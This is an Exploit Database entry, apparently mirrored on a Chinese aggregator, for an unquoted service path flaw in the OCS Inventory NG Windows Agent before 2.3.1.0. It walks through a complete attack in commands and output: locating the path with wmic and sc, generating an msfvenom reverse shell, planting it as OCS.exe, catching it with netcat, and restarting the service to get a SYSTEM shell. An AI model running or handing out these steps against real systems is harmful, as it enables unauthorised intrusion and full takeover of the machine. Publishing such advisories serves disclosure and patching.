OCS Inventory NG 2.3.0.0 – Unquoted Service Path

• Exploit Database
• 30 阅读

• 作者： msd0pe
  日期： 2023-04-25
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/51389/

• #####################################################################
  # #
  #Exploit Title: OCS Inventory NG 2.3.0.0 - Unquoted Service Path#
  #Date: 2023/04/21 #
  #Exploit Author: msd0pe #
  #Vendor Homepage: https://oscinventory-ng.org #
  #Software Link: https://github.com/OCSInventory-NG/WindowsAgent #
  #My Github: https://github.com/msd0pe-1 #
  #Fixed in version 2.3.1.0 #
  # #
  #####################################################################
  
  OCS Inventory NG Windows Agent: 
  Versions below 2.3.1.0 contains an unquoted service path which allows attackers to escalate privileges to the system level.
  
  [1] Find the unquoted service path:
  > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
  
  OCS Inventory Service OCS Inventory Service C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe Auto
  
  [2] Get informations about the service:
  > sc qc "OCS Inventory Service"
  
  [SC] QueryServiceConfig SUCCESS
  
  SERVICE_NAME: OCS Inventory Service
  TYPE : 110WIN32_OWN_PROCESS (interactive)
  START_TYPE : 2 AUTO_START
  ERROR_CONTROL: 1 NORMAL
  BINARY_PATH_NAME : C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe
  LOAD_ORDER_GROUP :
  TAG: 0
  DISPLAY_NAME : OCS Inventory Service
  DEPENDENCIES : RpcSs
   : EventLog
   : Winmgmt
   : Tcpip
  SERVICE_START_NAME : LocalSystem
  
  [3] Generate a reverse shell:
  > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o OCS.exe
  
  [4] Upload the revese shell to C:\Program Files (x86)\OCS.exe
  > put OCS.exe
  > ls
  drw-rw-rw-0Sat Apr 22 05:20:38 2023 .
  drw-rw-rw-0Sat Apr 22 05:20:38 2023 ..
  drw-rw-rw-0Sun Jul 24 08:18:13 2022 Common Files
  -rw-rw-rw-174Sun Jul 24 08:12:38 2022 desktop.ini
  drw-rw-rw-0Thu Jul 28 13:00:04 2022 Internet Explorer
  drw-rw-rw-0Sun Jul 24 07:27:06 2022 Microsoft
  drw-rw-rw-0Sun Jul 24 08:18:13 2022 Microsoft.NET
  drw-rw-rw-0Sat Apr 22 04:51:20 2023 OCS Inventory Agent
  -rw-rw-rw- 7168Sat Apr 22 05:20:38 2023 OCS.exe
  drw-rw-rw-0Sat Apr 22 03:24:58 2023 Windows Defender
  drw-rw-rw-0Thu Jul 28 13:00:04 2022 Windows Mail
  drw-rw-rw-0Thu Jul 28 13:00:04 2022 Windows Media Player
  drw-rw-rw-0Sun Jul 24 08:18:13 2022 Windows Multimedia Platform
  drw-rw-rw-0Sun Jul 24 08:18:13 2022 Windows NT
  drw-rw-rw-0Fri Oct 28 05:25:41 2022 Windows Photo Viewer
  drw-rw-rw-0Sun Jul 24 08:18:13 2022 Windows Portable Devices
  drw-rw-rw-0Sun Jul 24 08:18:13 2022 Windows Sidebar
  drw-rw-rw-0Sun Jul 24 08:18:13 2022 WindowsPowerShell
  
  [5] Start listener
  > nc -lvp 4444
  
  [6] Reboot the service/server
  > sc stop "OCS Inventory Service"
  > sc start "OCS Inventory Service"
  
  OR
  
  > shutdown /r
  
  [7] Enjoy !
  192.168.1.102: inverse host lookup failed: Unknown host
  connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
  Microsoft Windows [Version 10.0.19045.2130]
  (c) Microsoft Corporation. All rights reserved.
  
  C:\Windows\system32>whoami
  
  nt authority\system